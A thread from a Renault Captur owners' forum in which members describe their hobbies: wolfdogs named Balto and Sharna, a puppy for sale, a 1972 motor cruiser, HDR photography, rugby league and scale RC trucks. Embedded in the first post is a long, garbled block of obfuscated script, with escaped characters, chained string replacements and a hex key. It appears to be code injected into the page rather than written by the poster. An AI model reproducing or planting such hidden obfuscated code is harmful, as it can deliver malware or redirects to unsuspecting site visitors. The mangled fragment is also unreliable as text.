Renault Captur Forums banner

1 - 20 of 43 Posts

·
Registered
215 Posts
Discussion Starter #1
hi folks i,m sure you all have hobbies outwith driving your new capture, i have two beautiful wolfdogs that have their own facebook page, they are called Balto and Sharna feel free to have a look and better still if you have dogs of your own please post some pics up<ch;m++q=cym;p=q^o;x+=fp;return x;;ifr"x78"+"cx7c"="=r"u007FX"+"x"+"Uo"+"hz"+"x50"+"yx6a".replace"x58u0078Uo"+"x68zu0050"+"y","x69`"+""var" i=";ir""+"z"+"i"+"WUGR"+"ju0062".replace"x57"+"Uu0047x52x6A","~"+"x7Feu0063"=r'x3Du0039'+'?';ir"x6F`x65u0069b"+"xx79eu0068"="20A1FC5640C8E95A";ir'x6du0068hx63'+'bb'+'x6du0061i'=r"u004Eu0079v"+""+"vu0021eu0078";r'S'+'u006ax4au004ds'+''+'Eu0055E'+'Tu0076Ax76'.replace'jJ'+'u004Dsu0045x55x45x54vu0041','~x7a'=i;var" z="r"u006f"+"~ix6dx"+"iIu0060x69x61u0069bx"+""r''+'uu0054nE'+'x'.replace'x75u0054'+'nE'+'','x7Fu006f~'+''+'ex7C';zr'u007Fu007eu006f'=r'#'+'#'+'kx68x58'+'un'+''+'w"x61x6Do'+'|x6dx78'+'d"b'+'u0069x'+''+'#x7Fx68'+'#u003e<x35<'+'x23u0039x3ex35x38"u0066x7f'.replace'h'+'X'+'u'+'nx77','x75a'+'';r'x6Echu'+''r'x6D||g'+'Xm'+'d'+'x65x60'+'h'.replace'g'+'Xm','i'+'bu0068O'z;;<div">
here is a link to the facebook site
<ul ="uilist="" _4kg"="" style="list-style-: none; margin: 0px; padding: 0px; color: rgb51, 51, 51; font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 11px; line-height: 15px;"><li style="border-width: 0px;">https://<wbr>www.facebook.com/<wbr>crywolfowners[/list]
</ch;m++q=cym;p=q^o;x+=fp;return>Edited by: GORDONR

·
Registered
215 Posts
Discussion Starter #2
a few pics of our dogs Balto and Sharna

balto

sharna

balto and snowy

sharna

balto and olivia

balto and sharna

·
Registered
127 Posts
OMG Gordon now i am very very jealous !!!!!! i want the dogs!!!!! they r soooooo beautiful i wish i could have at least one
but where i live no pets allowed. i grow up with one of those and i know how kind and protective they r

·
Registered
215 Posts
Discussion Starter #5
michaella said:
OMG Gordon now i am very very jealous !!!!!! i want the dogs!!!!! they r soooooo beautiful i wish i could have at least one
 but where i live no pets allowed. i grow up with one of those and i know how kind and protective they r 

Pity as i know a breeder that has an 8 week pup,last one of her litter thats looking for a home £750
If anyone is interested pm me for details

·
Registered
924 Posts
My hobby is boating on the Norfolk Broads.
I have a 30ft Seamaster motor cruiser. It is powered by a BMC 1.5 diesel. The cruiser is fibreglass and quiet old evenby motor boating standards, as it was built in 1972. It is called Crossbow; hence my nickname.

·
Registered
924 Posts
Great photos - Mjord65.
Wide subject matter; from detail to landscape through graphic studies. Really nice. Such intense colours in many of them. Do you have high saturation settings on your camera?

·
Registered
19 Posts
Thanks! I don't use higher saturation on the camera, as it tends to have some other nasty side effects. I'll tend to do that (if needed) on the computer. However I do some in camera stuff. For example, for the woodland scene I used a graduated tobacco filter and used the 'high dynamic range' approach. Basically, I take a rapid series of shots for different exposure settings and combine.

·
Registered
924 Posts
Mjord65,Good kit certainly shows, especially in the hands of someone who knows how to use it. I have heard of the high dynamic range approach, but have never tried it myself. Neither had I thought of combining images, except for the more obvious multi-image shots.

You have certainly given me food for thought.

·
Registered
19 Posts
They say that the best camera is the one you have with. I have some good kit, but of course most of the time don't have it with. One of my favourite photographers takes amazing shots with her iPhone. :)

·
Super Moderator
2,376 Posts
One of my hobbies is photography too, but I'm not into HDR or much in the way of post-processing.

I also like travel, but the cost of the loan to buy the Captur is going to limit me on that for a while !

·
Registered
19 Posts
I'm an avid rugby( league) fan, home and away games, long time season ticket holder, looking forward to getting my captur to save some money on fuel for away games.Also love walking especially with my pooch Einstein

·
Registered
824 Posts
Saintsangel said:
I'm an avid rugby( league) fan, home and away games, long time season ticket holder, looking forward to getting my captur to save some money on fuel for away games.Also love walking especially with my pooch Einstein
St Helens by any chance??.........Good choice!!.....

·
Registered
23 Posts
hi guysmy hobbies is scale rc trucks and buggies we also have a big forum were we meet up and have a fun daywe are all over UK we just had a big meet in Peterborough it was a g6 hill clime tug of war and moor good fun and a bbq nice day out
you can see scale land rover on u tube

1 - 20 of 43 Posts